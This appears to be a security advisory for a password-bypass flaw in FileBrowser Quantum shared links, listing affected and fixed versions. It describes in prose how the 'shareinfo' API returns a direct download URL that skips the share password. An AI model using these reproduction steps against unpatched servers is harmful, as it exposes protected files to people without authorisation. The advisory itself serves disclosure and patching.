FileBrowser Quantum Password Bypass Vulnerability in Shared Links
Vulnerability
A vulnerability in FileBrowser Quantum prior to versions 1.1.3-stable and 1.2.6-beta allows recipients of password-protected shared files to bypass the password requirement and download the files. This issue arises because the API provides a direct download link in the share details, accessible to anyone with the share link, regardless of password protection. The vulnerability affects versions 1.1.2-stable and 1.2.5-beta.
Impact
Exploiting this vulnerability allows users to download password-protected files without entering the required password, undermining the security of file sharing in the application.
Reproduction
To reproduce this vulnerability, an authenticated user can create a share for a file, specifying a password and allowing anonymous access. After copying the share link, an API request can be made to the 'shareinfo' endpoint using the share hash. The response includes a download URL that can be used to download the file without the password.
Remediation
Users can update to FileBrowser Quantum versions 1.1.3-stable or 1.2.6-beta, where this vulnerability has been fixed.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.